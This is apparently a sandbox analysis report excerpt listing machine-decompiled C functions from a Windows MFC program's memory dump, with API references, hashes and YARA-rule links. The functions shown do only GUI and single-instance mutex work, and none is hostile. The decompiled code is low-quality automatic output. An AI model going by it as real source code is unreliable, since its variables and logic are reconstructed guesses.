			E004125AE(WCHAR** __ecx) {
				int _t20;
				void* _t25;
				signed int _t27;
				void* _t30;
				void* _t37;
				WCHAR* _t40;
				void* _t42;
				void* _t44;
				WCHAR* _t47;

				L004269E6();
				_push(__ecx);
				_push(__ecx);
				 *(_t42 - 0x14) =  *(_t42 - 0x14) & 0x00000000;
				_t30 = _t42 - 0x10;
				L00425E08();
				_t40 =  *__ecx;
				_t27 = 1;
				_t47 = _t40;
				 *(_t42 - 4) = _t27;
				if(_t47 != 0) {
					if(_t47 != 0) {
						_t20 = lstrlenW(_t40);
						_t6 = _t20 + 2; // 0x2
						_t37 = _t20 + _t6;
						E004269B0(_t37 + 0x00000003 & 0x000000fc, _t30);
						_t25 = _t44;
						_push(_t37);
						_push(_t40);
						_push(_t25);
						L004265F4();
					} else {
						_t25 = 0;
					}
					_push(_t25);
					L004261A4();
				}
				_push(_t42 - 0x10);
				L0042611A();
				 *(_t42 - 0x14) = _t27;
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return  *((intOrPtr*)(_t42 + 8));
			}

0x004125b3
0x004125b8
0x004125b9
0x004125ba
0x004125c3
0x004125c6
0x004125cb
0x004125cf
0x004125d0
0x004125d2
0x004125d5
0x004125d7
0x004125de
0x004125e4
0x004125e4
0x004125ef
0x004125f4
0x004125f6
0x004125f7
0x004125f8
0x004125f9
0x004125d9
0x004125d9
0x004125d9
0x004125fe
0x00412602
0x00412602
0x0041260d
0x0041260e
0x00412613
0x00412616
0x0041261d
0x0041262b
0x00412636

APIs

_EH_prolog.MSVCRT ref: 004125B3
#540.MFC42 ref: 004125C6
lstrlenW.KERNEL32 ref: 004125DE
#1574.MFC42(?,?,00000002), ref: 004125F9
#860.MFC42(00000000,?,?,00000002), ref: 00412602
#535.MFC42(?), ref: 0041260E
#800.MFC42(?), ref: 0041261D

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1574#535#540#800#860H_prologlstrlen
String ID:
API String ID: 3104342797-0
Opcode ID: a9caf953fb915a83924b741f9c49947f30aa0ba6d893364062bf688cc10169a3
Instruction ID: a6d74f2e08db4ea95024fcbdf547c63c93b2f5c25960d15f9053d2bd510a2327
Opcode Fuzzy Hash: a9caf953fb915a83924b741f9c49947f30aa0ba6d893364062bf688cc10169a3
Instruction Fuzzy Hash: D8018E72A1012AABCB10DB94DC46AEF7778EF41308F41441FF401B7241CBB86A44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00420316, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00420316(intOrPtr __ecx) {
				intOrPtr _t11;
				void* _t14;
				intOrPtr _t26;
				void* _t28;

				_t11 = E00429DA4;
				L004269E6();
				_push(__ecx);
				_push(__ecx);
				_t26 = __ecx;
				 *((intOrPtr*)(_t28 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42c4fc;
				_push(0);
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t28 - 4)) = 0;
				L004268C4();
				_t14 = __ecx + 0xc;
				_push(0);
				_push("PJ_Instance_Checker_Mutex");
				_push(0);
				 *((char*)(_t28 - 4)) = 1;
				L004268C4();
				_push(0xc);
				 *((char*)(_t28 - 4)) = 2;
				 *((intOrPtr*)(__ecx)) = 0x42ef14;
				L00425E38();
				 *((intOrPtr*)(_t28 - 0x14)) = E00429DA4;
				 *((char*)(_t28 - 4)) = 3;
				if(E00429DA4 == 0) {
					_t11 = 0;
				} else {
					_push(1);
					_push(_t14);
					L004268BE();
				}
				 *((intOrPtr*)(_t26 + 0x14)) = _t11;
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t26;
			}

0x00420316
0x0042031b
0x00420320
0x00420321
0x00420324
0x00420327
0x0042032a
0x00420335
0x00420336
0x00420337
0x00420338
0x0042033b
0x00420340
0x00420343
0x00420344
0x00420349
0x0042034c
0x00420350
0x00420355
0x00420357
0x0042035b
0x00420361
0x00420369
0x0042036e
0x00420372
0x0042037e
0x00420374
0x00420374
0x00420376
0x00420377
0x00420377
0x00420383
0x0042038b
0x00420393

APIs

_EH_prolog.MSVCRT ref: 0042031B
#413.MFC42(00000000,00000000,00000000), ref: 0042033B
#413.MFC42(00000000,PJ_Instance_Checker_Mutex,00000000,00000000,00000000,00000000), ref: 00420350
#823.MFC42(0000000C,00000000,PJ_Instance_Checker_Mutex,00000000,00000000,00000000,00000000), ref: 00420361
#521.MFC42(?,00000001,00000000,PJ_Instance_Checker_Mutex,00000000,00000000,00000000,00000000), ref: 00420377

Strings

PJ_Instance_Checker_Mutex, xrefs: 00420344

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #413$#521#823H_prolog
String ID: PJ_Instance_Checker_Mutex
API String ID: 1547391537-1177087269
Opcode ID: 68d9ca2ed107e41dfa5c908877aedfb50277485e4334587db1ef13e6404cb0a0
Instruction ID: 155303779f478b0964fccfda0c54cb574fd3ade86476229bdb87165a2b814a90
Opcode Fuzzy Hash: 68d9ca2ed107e41dfa5c908877aedfb50277485e4334587db1ef13e6404cb0a0
Instruction Fuzzy Hash: 4401D471701264AED724DB6AA945B6FFBF8EF84B04F90406FF045E3281D7F85A448365

Uniqueness

Uniqueness Score: -1.00%

Function 004013D4, Relevance: 10.5, APIs: 7, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004013D4(void* __ecx) {
				signed int _t16;
				signed int _t21;
				void* _t31;
				void* _t35;
				void* _t36;

				_t16 = E00428BD7;
				L004269E6();
				_push(__ecx);
				_t31 = __ecx + 0xc0;
				if(_t31 != 0 &&  *((intOrPtr*)(_t31 + 0x20)) != 0) {
					_t35 = __ecx + 0x80;
					if(_t35 != 0 &&  *((intOrPtr*)(_t35 + 0x20)) != 0) {
						_push(0x44217c);
						L00426120();
						_t16 = 0 |  *((intOrPtr*)(_t36 + 8)) == 0x00000000;
						_t21 = _t16;
						_push(_t21);
						L0042625E();
						_push(_t21);
						L0042625E();
						_push(0x8077);
						L00425FB8();
						_push( *((intOrPtr*)(_t36 - 0x10)));
						 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
						L00426120();
						 *(_t36 - 4) =  *(_t36 - 4) | 0xffffffff;
						L00425DFC();
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
				return _t16;
			}

0x0040e578
0x0040e57d
0x0040e582
0x0040e586
0x0040e590
0x0040e597
0x0040e59f
0x0040e5a6
0x0040e5ad
0x0040e5b9
0x0040e5bc
0x0040e5be
0x0040e5bf
0x0040e5c4
0x0040e5c7
0x0040e5cc
0x0040e5d4
0x0040e5d9
0x0040e5dc
0x0040e5e2
0x0040e5e7
0x0040e5ee
0x0040e5ee
0x0040e59f
0x0040e5f9
0x0040e601

APIs

_EH_prolog.MSVCRT ref: 0040E57D
#6199.MFC42(0044217C), ref: 0040E5AD
#2642.MFC42(00000000,0044217C), ref: 0040E5BF
#2642.MFC42(00000000,00000000,0044217C), ref: 0040E5C7
#537.MFC42(00008077,00000000,00000000,0044217C), ref: 0040E5D4
#6199.MFC42(?,00008077,00000000,00000000,0044217C), ref: 0040E5E2
#800.MFC42(?,00008077,00000000,00000000,0044217C), ref: 0040E5EE

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2642#6199$#537#800H_prolog
String ID:
API String ID: 4205915643-0
Opcode ID: f21748cb33225e60186ff439e15b694c2e79e3f033dea034abf3a0834f91070e
Instruction ID: 60a51b4f8ac3b02684fa2e74234a177b9df2c74f0557523aa8a93d39fe6bf4ad
Opcode Fuzzy Hash: f21748cb33225e60186ff439e15b694c2e79e3f033dea034abf3a0834f91070e
Instruction Fuzzy Hash: 7701B572700230ABDF14ABA6DC816BEB661BF84358F91493FE142761C1DB791D12C65C

Uniqueness

Uniqueness Score: -1.00%

Function 0040222F, Relevance: 10.5, APIs: 7, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 15%

			E0040222F(void* __ecx, intOrPtr _a4) {
				void* _t13;
				intOrPtr _t15;

				_t15 = _a4;
				_push(__ecx + 0x60);
				_push(0x3f6);
				_push(_t15);
				L0042622E();
				_push(__ecx + 0xa0);
				_push(0x3f2);
				_push(_t15);
				L0042622E();
				_push(__ecx + 0xe0);
				_push(0x3f4);
				_push(_t15);
				L0042622E();
				_push(__ecx + 0x120);
				_push(0x3f3);
				_push(_t15);
				L0042622E();
				_push(__ecx + 0x160);
				_push(0x3f5);
				_push(_t15);
				L0042622E();
				_t13 = __ecx + 0x1a0;
				_push(_t13);
				_push(0x3f1);
				_push(_t15);
				L0042622E();
				_push(__ecx + 0x1e0);
				_push(0x3f0);
				_push(_t15);
				L0042622E();
				return _t13;
			}

0x0040e86d
0x0040e874
0x0040e875
0x0040e87a
0x0040e87b
0x0040e886
0x0040e887
0x0040e88c
0x0040e88d
0x0040e898
0x0040e899
0x0040e89e
0x0040e89f
0x0040e8aa
0x0040e8ab
0x0040e8b0
0x0040e8b1
0x0040e8bc
0x0040e8bd
0x0040e8c2
0x0040e8c3
0x0040e8c8
0x0040e8ce
0x0040e8cf
0x0040e8d4
0x0040e8d5
0x0040e8e0
0x0040e8e1
0x0040e8e6
0x0040e8e7
0x0040e8ee

APIs

#2302.MFC42(?,000003F6,?), ref: 0040E87B
#2302.MFC42(?,000003F2,?,?,000003F6,?), ref: 0040E88D
#2302.MFC42(?,000003F4,?,?,000003F2,?,?,000003F6,?), ref: 0040E89F
#2302.MFC42(?,000003F3,?,?,000003F4,?,?,000003F2,?,?,000003F6,?), ref: 0040E8B1
#2302.MFC42(?,000003F5,?,?,000003F3,?,?,000003F4,?,?,000003F2,?,?,000003F6,?), ref: 0040E8C3
#2302.MFC42(?,000003F1,?,?,000003F5,?,?,000003F3,?,?,000003F4,?,?,000003F2,?,?), ref: 0040E8D5
#2302.MFC42(?,000003F0,?,?,000003F1,?,?,000003F5,?,?,000003F3,?,?,000003F4,?,?), ref: 0040E8E7

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2302
String ID:
API String ID: 735948377-0
Opcode ID: 54c8e57c050409d7ee838c28da7d17aa8d415d06517f1ca64163f14c906e4949
Instruction ID: 50998a09fc423bc50fa0be01117b3b66080c9966ff00fe1b0ecfe502d3d87b45
Opcode Fuzzy Hash: 54c8e57c050409d7ee838c28da7d17aa8d415d06517f1ca64163f14c906e4949
Instruction Fuzzy Hash: DFF0A935680216BBE312B611FC42EFB67ACDB45B04F85083FBA8595081DF6866116376

Uniqueness

Uniqueness Score: -1.00%

Function 0041132F, Relevance: 9.2, APIs: 6, Instructions: 157
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0041132F(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				char _v36;
				struct tagRECT _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _v68;
				struct tagRECT _v84;
				intOrPtr _t77;
				signed int _t81;
				int _t92;
				long _t93;
				void* _t95;
				intOrPtr* _t110;
				signed int _t115;
				void* _t123;
				long _t127;
				long _t128;
				unsigned int _t130;
				intOrPtr _t133;
				signed int _t136;

				_push( &_v36);
				_t133 = __ecx;
				_push( &_v20);
				_v12 = __ecx;
				L00401F3C(__ecx,  &_v28);
				_t77 =  *((intOrPtr*)(__ecx + 0xe4));
				if(_t77 == 0xe81b || _t77 == 0xe81e) {
					_v8 = 1;
				} else {
					_v8 = _v8 & 0x00000000;
				}
				_v24 = _v24 & 0x00000000;
				asm("sbb ebx, ebx");
				_t115 =  ~_v8 & 0xfffffffe;
				GetWindowRect( *( *((intOrPtr*)(_t133 + 0x74)) + 0x20),  &_v84);
				_t81 = _v28;
				_v16 = _t81;
				if(_t81 <= _v20) {
					do {
						_t130 =  *( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x74)) + 0x84)) + _t81 * 4);
						_v32 = _t130;
						if(_t130 >> 0x10 != 0 &&  *((intOrPtr*)( *_t130 + 0xd0))() != 0) {
							GetWindowRect( *(_t130 + 0x20),  &_v52);
							_t92 = OffsetRect( &_v52,  ~(_v84.left),  ~(_v84.top));
							_push(0x42dee8);
							L004264F2();
							if(_t92 != 0) {
								_t110 = _t130 + 0x84;
								if(_v8 == 0) {
									_t110 = _t130 + 0x8c;
								}
								_t128 = _v52.left;
								_v60 =  *_t110 + _t128;
								_t127 = _v52.top;
								_v68 = _t128;
								_v64 = _t127;
								_v56 =  *((intOrPtr*)(_t110 + 4)) + _t127;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t130 = _v32;
							}
							_t93 = _v52.left;
							_t123 = 0;
							if(_v8 == 0) {
								_t93 = _v52.top;
							}
							if(_t93 != _t115) {
								if(_v8 != _t123) {
									if( *((intOrPtr*)(_v12 + 0xe4)) != 0xe81b) {
										_push(_t123);
									} else {
										_push(0xfffffffe);
									}
									_push(_t115 - _v52.left);
								} else {
									_push(_t115 - _v52.top);
									_push(_t123);
								}
								OffsetRect( &_v52, ??, ??);
								_t136 = 1;
								_push(_t136);
								_push(_v52.bottom - _v52.top);
								_push(_v52.right - _v52.left);
								_push(_v52.top);
								_push(_v52.left);
								L00426564();
								_v24 = _t136;
								_t123 = 0;
							}
							if(_v8 == _t123) {
								_t95 = _v52.bottom - _v52.top;
							} else {
								_t95 = _v52.right - _v52.left;
							}
							_t133 = _v12;
							_t115 = _t115 + _t95 - 2;
						}
						_t81 = _v16 + 1;
						_v16 = _t81;
					} while (_t81 <= _v20);
					if(_v24 != 0) {
						 *( *((intOrPtr*)(_t133 + 0x70)) + 0xbc) =  *( *((intOrPtr*)(_t133 + 0x70)) + 0xbc) | 0x0000000c;
						return _t81;
					}
				}
				return _t81;
			}

0x0041133a
0x0041133e
0x00411340
0x00411345
0x00411348
0x0041134d
0x00411358
0x00411367
0x00411361
0x00411361
0x00411361
0x00411371
0x00411381
0x00411383
0x00411386
0x0041138c
0x00411392
0x00411395
0x0041139c
0x004113a5
0x004113aa
0x004113b3
0x004113d2
0x004113ee
0x004113f0
0x004113f7
0x004113fe
0x00411404
0x0041140a
0x0041140c
0x0041140c
0x00411414
0x0041141c
0x0041141f
0x0041142a
0x0041142d
0x00411430
0x00411433
0x00411434
0x00411435
0x00411436
0x00411437
0x0041143a
0x00411440
0x00411443
0x00411448
0x0041144a
0x0041144a
0x0041144f
0x00411454
0x0041146e
0x00411474
0x00411470
0x00411470
0x00411470
0x0041147a
0x00411456
0x0041145d
0x0041145e
0x0041145e
0x0041147f
0x00411489
0x0041148a
0x0041148d
0x00411494
0x00411495
0x00411498
0x0041149b
0x004114a0
0x004114a3
0x004114a3
0x004114a8
0x004114b5
0x004114aa
0x004114ad
0x004114ad
0x004114b8
0x004114bb
0x004114bb
0x004114c2
0x004114c6
0x004114c6
0x004114d4
0x004114d9
0x00000000
0x004114d9
0x004114d4
0x004114e3

APIs

GetWindowRect.USER32 ref: 00411386
GetWindowRect.USER32 ref: 004113D2
OffsetRect.USER32(?,?,?), ref: 004113EE
#4083.MFC42(0042DEE8), ref: 004113F7
OffsetRect.USER32(?,?,00000000), ref: 0041147F
#4299.MFC42(?,?,?,?,00000001), ref: 0041149B

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$OffsetWindow$#4083#4299
String ID:
API String ID: 2080857532-0
Opcode ID: 0f4533b0c7c320f2cb15c268db7500ce7500ab98a1038e83a0a94d9427827f3a
Instruction ID: 6decf1f17f83ae59ac6d4db5d85e798141b8f7c51c962a44a705d6d0556a56c4
Opcode Fuzzy Hash: 0f4533b0c7c320f2cb15c268db7500ce7500ab98a1038e83a0a94d9427827f3a
Instruction Fuzzy Hash: 69510671A00119EFCF14CFA8D984AEEB7B9FF48714F14816AEA11F7260D734A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004014D3, Relevance: 9.1, APIs: 6, Instructions: 80
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E004014D3(void* __ecx) {
				int _t27;
				struct tagPOINT _t59;
				void* _t61;
				void* _t64;

				L004269E6();
				_t61 = __ecx;
				_t27 = SendMessageA( *(__ecx + 0x134), 0x1004, 0, 0);
				if(_t27 != 0) {
					_t58 = _t61 + 0x114;
					_t27 = L004018DE(_t61 + 0x114);
					 *(_t64 - 0x10) = _t27;
					if(_t27 != 0) {
						_push(0);
						_push(_t64 - 0x28);
						_push(L00402045(_t58, _t64 - 0x10));
						L00426114();
						_t59 =  *(_t64 + 0xc);
						 *((intOrPtr*)(_t64 - 0x14)) =  *((intOrPtr*)(_t64 + 0x10));
						 *(_t64 - 0x18) = _t59;
						ScreenToClient( *(_t61 + 0x20), _t64 - 0x18);
						_push( *((intOrPtr*)(_t64 - 0x14)));
						_t27 = PtInRect(_t64 - 0x28,  *(_t64 - 0x18));
						if(_t27 != 0) {
							L004020E5(_t64 - 0x7c);
							 *(_t64 - 4) = 0;
							L00401B77(0x87);
							_push(0x8a);
							L004020F4(_t64 - 0x7c);
							L004015A0(_t64 - 0x7c, 0);
							_push(0);
							_push(L00401307());
							_push( *((intOrPtr*)(_t64 + 0x10)));
							_push(_t59);
							_push(2);
							L0042610E();
							L0040212B(_t64 - 0x7c);
							 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
							_t27 = L00401B18(_t64 - 0x7c);
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t27;
			}

0x0040abf9
0x0040ac07
0x0040ac15
0x0040ac1d
0x0040ac23
0x0040ac2b
0x0040ac32
0x0040ac35
0x0040ac3e
0x0040ac3f
0x0040ac4b
0x0040ac4e
0x0040ac56
0x0040ac59
0x0040ac60
0x0040ac66
0x0040ac6c
0x0040ac76
0x0040ac7e
0x0040ac83
0x0040ac90
0x0040ac93
0x0040ac98
0x0040aca0
0x0040aca9
0x0040acae
0x0040acb6
0x0040acb9
0x0040acbc
0x0040acbd
0x0040acbf
0x0040acc7
0x0040accc
0x0040acd3
0x0040acd3
0x0040ac7e
0x0040ac35
0x0040acde
0x0040ace6

APIs

_EH_prolog.MSVCRT ref: 0040ABF9
SendMessageA.USER32 ref: 0040AC15
#3293.MFC42(00000000,?,?,00000000), ref: 0040AC4E
ScreenToClient.USER32 ref: 0040AC66
PtInRect.USER32(?,?,?), ref: 0040AC76
#6270.MFC42(00000002,?,?,00000000,00000000,00000000,0000008A,00000087), ref: 0040ACBF

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3293#6270ClientH_prologMessageRectScreenSend
String ID:
API String ID: 3149471435-0
Opcode ID: 5f67e09e18f4356f469c4d1751db093f193f34794ea07f94dd2cbcc2bd7ed344
Instruction ID: 5a8bc6d03af3f62891e9d1f2dec41c92cebb6e5eec7f1b460f59778097029ece
Opcode Fuzzy Hash: 5f67e09e18f4356f469c4d1751db093f193f34794ea07f94dd2cbcc2bd7ed344
Instruction Fuzzy Hash: BC216171A002099BCB20EFA1CC86EEEBB79AB48304F50443FB111B31D1DB345904DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00401703, Relevance: 9.1, APIs: 6, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00401703(intOrPtr __ecx) {
				signed int _t21;
				void* _t22;
				intOrPtr _t25;
				signed int _t36;
				intOrPtr _t40;
				intOrPtr _t42;
				void* _t44;
				void* _t54;

				_t21 = E0042924E;
				L004269E6();
				_t25 =  *((intOrPtr*)(_t44 + 8));
				_t42 = __ecx;
				if(_t25 > 0) {
					_t40 =  *((intOrPtr*)(_t44 + 0xc));
					if(_t40 > 0) {
						 *((intOrPtr*)(__ecx + 0x44)) = _t40;
						 *((intOrPtr*)(__ecx + 0x48)) = _t25;
						if( *((intOrPtr*)(__ecx + 0x3c)) == 0) {
							_push(8);
							L00425E38();
							 *((intOrPtr*)(_t44 + 8)) = E0042924E;
							 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
							if(E0042924E == 0) {
								_t21 = 0;
							} else {
								L00425F8E();
							}
							 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
							 *(_t42 + 0x3c) = _t21;
						} else {
							L004266BA();
						}
						_push(1);
						_push(2);
						_push(1);
						_push( *0x440d0c);
						_push( *0x440d08);
						L00426000();
						_t22 = E00401140(_t42, _t54,  *(_t42 + 0x3c), _t25);
						_t21 = E00401140(_t42, _t54,  *(_t42 + 0x3c), _t40);
						if(_t22 == 0 || _t21 == 0) {
							L004266BA();
							_t36 =  *(_t42 + 0x3c);
							if(_t36 != 0) {
								_t21 =  *((intOrPtr*)( *_t36 + 4))(1);
							}
							 *(_t42 + 0x3c) =  *(_t42 + 0x3c) & 0x00000000;
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t44 - 0xc));
				return _t21;
			}

0x00416193
0x00416198
0x0041619e
0x004161a5
0x004161a7
0x004161ad
0x004161b2
0x004161bb
0x004161c0
0x004161c3
0x004161cc
0x004161ce
0x004161d4
0x004161d7
0x004161dd
0x004161e8
0x004161df
0x004161e1
0x004161e1
0x004161ea
0x004161ee
0x004161c5
0x004161c5
0x004161c5
0x004161f1
0x004161f6
0x004161f8
0x004161fa
0x00416200
0x00416206
0x00416211
0x0041621e
0x00416225
0x0041622e
0x00416233
0x00416238
0x0041623e
0x0041623e
0x00416241
0x00416241
0x00416225
0x004161b2
0x0041624b
0x00416253

APIs

_EH_prolog.MSVCRT ref: 00416198
#2408.MFC42 ref: 004161C5
#823.MFC42(00000008), ref: 004161CE
#384.MFC42 ref: 004161E1
#2096.MFC42(00000001,00000002,00000001), ref: 00416206
#2408.MFC42(00000001,00000002,00000001), ref: 0041622E

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
